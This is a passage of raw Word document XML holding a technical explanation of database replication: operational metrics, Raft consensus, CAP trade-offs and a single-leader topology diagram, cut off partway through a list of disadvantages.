    <w:p w14:paraId="3905FE9B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36055C06" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replication slot unbounded growth: offline consumer → disk full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A8123F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Prevention: max_slot_wal_keep_size, slot lag monitoring, operational runbooks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D0B9F9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7A7B8369" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The Key Operational Metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6D3A05" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replication lag (seconds and bytes): primary indicator of replica health</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C57BACA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  WAL generation rate: if &gt; replica apply rate → lag growing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA5C3A7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Slot lag bytes: if growing → primary disk risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4FC990" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Synchronous commit latency: p99 increases = replica network or disk issue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F488BB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Replica count (online/configured): fewer replicas = reduced fault tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012E4B99" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="6816E201" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The Consensus Foundation (Raft):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E92DC2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Leader: single write point per term</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8D5846" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Quorum commit: majority must acknowledge before entry is committed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75804560" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Safety: committed entries never lost (overlap of election quorum + commit quorum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F26CCF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Liveness: new leader elected in &lt; 1 second on failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734521A1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2814ED" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Used by: etcd (Patroni's DCS), CockroachDB, TiKV, MongoDB (Raft variant)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B79041" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7725E461" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The Fundamental Trade-offs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B7441E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Durability   ↔  Write Latency (sync replication adds RTT to every commit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BCF583" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Consistency  ↔  Read Throughput (strong reads must go to primary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7423686C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Availability ↔  Consistency (CAP theorem — partition forces choice)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D69DC2B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replica count ↔  Write amplification (more replicas = more writes per commit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31300483" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Lag tolerance ↔  Operational simplicity (zero-lag requires sync replication complexity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A29D37C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The deepest insight at a senior level: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>replication is not a feature you add to a database — it is a fundamental architectural choice that changes the semantics of every operation in your system.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve"> The moment you introduce replication, you have introduced the possibility that different parts of your system see different versions of the same data simultaneously. Every application that reads from replicas must make explicit decisions about which operations require strong consistency and which can tolerate staleness — and these decisions must be made at design time, not discovered during incidents. The engineers who build highly available, consistent distributed data systems understand that replication lag, failover data loss, and split brain are not bugs to be fixed — they are fundamental properties of distributed systems governed by physics (speed of light limits synchronous replication across distance) and mathematics (the CAP theorem constrains what is achievable simultaneously). The engineering discipline is choosing where on the consistency-availability-latency trade-off space your system must operate, implementing the replication strategy that delivers those guarantees, and building application code that </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>correctly handles the consistency model you've chosen — not the stronger model you wish you had.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D34C59" w14:textId="77777777" w:rsidR="00A12791" w:rsidRDefault="00A12791" w:rsidP="00AD5AD3"/>
    <w:p w14:paraId="6EDE4E6F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database Replication in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6173FA8C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What Database Replication Really Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395FC160" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Database replication is the process of maintaining copies of the same data on multiple database nodes (machines), so that if one machine fails, others can serve the data, and to improve read throughput by distributing queries across replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298A44A9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental motivations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3878D77E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1495"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>High Availability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> If the primary database crashes, a replica takes over. Users experience minimal or zero downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEFDD49" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1495"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read Scalability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> One machine can handle X queries/second. N replicas can handle N×X queries/second (for reads).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2308EB33" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1495"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Geographic Latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Put a replica near users in Tokyo so they read local data (5ms) instead of querying Virginia (200ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2833C76A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1495"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disaster Recovery:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> If an entire datacenter is destroyed (fire, flood, power), a replica in another region preserves the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6575F6B6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What replication is NOT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79868FB6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1496"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Not sharding/partitioning:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Sharding splits data across nodes (each has different data). Replication copies the SAME data to multiple nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A443307" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1496"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Not backup:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Backups are point-in-time snapshots (static). Replication is continuous, real-time synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65665B66" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1496"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Not caching:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Caches are derived, lossy, ephemeral stores. Replicas are full, durable, authoritative copies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CD3950" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental tension:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361C8310" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDCBDD9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replication introduces the hardest problems in distributed systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756C2125" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>- How do you keep copies in sync? (Consistency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50407742" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>- What happens when the network between nodes fails? (Partition tolerance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542C11B1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>- Can you still serve requests during failures? (Availability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AF90AA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="1F4D89AD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>This is the CAP theorem in action — and replication is where you feel it most acutely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA762FF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:pict w14:anchorId="566F9CCF">
          <v:rect id="_x0000_i5639" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8DD6D5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Replication Topologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28778F82" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Single-Leader (Primary-Replica / Master-Slave)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC937CF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6EC1E8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        ┌─────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6311ECF2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        │   Primary   │  ← All writes go here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BBEFEF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        │  (Leader)   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F06C81" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        └──────</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7F720B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37470064" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    ┌──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E6C17D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    │          │          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6499A4FC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755B49CF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>┌────────┐ ┌────────┐ ┌────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2B8A7A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│Replica │ │Replica │ │Replica │  ← Reads distributed here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036C42F7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│   1    │ │   2    │ │   3    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B51ACA2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>└────────┘ └────────┘ └────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3758B7D1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6190953B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1497"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>ALL writes go to the single primary (leader).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B9DD24" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1497"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary records writes in a write-ahead log (WAL) / binlog.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F65665A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1497"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replicas continuously receive the log and replay it (apply the same changes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60144DFB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1497"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Reads can go to any replica OR the primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06008B60" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEF98A5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1498"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Simple mental model (one place for writes → no write conflicts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBFE9AD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1498"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>Easy to reason about consistency (primary is always authoritative).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7475BB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1498"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Well-understood, battle-tested (PostgreSQL, MySQL, MongoDB, Redis).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD53F48" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E9776A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1499"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Write bottleneck: single primary limits write throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1496D136" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1499"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Single point of failure for writes: if primary dies, need failover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E4C4D4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1499"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
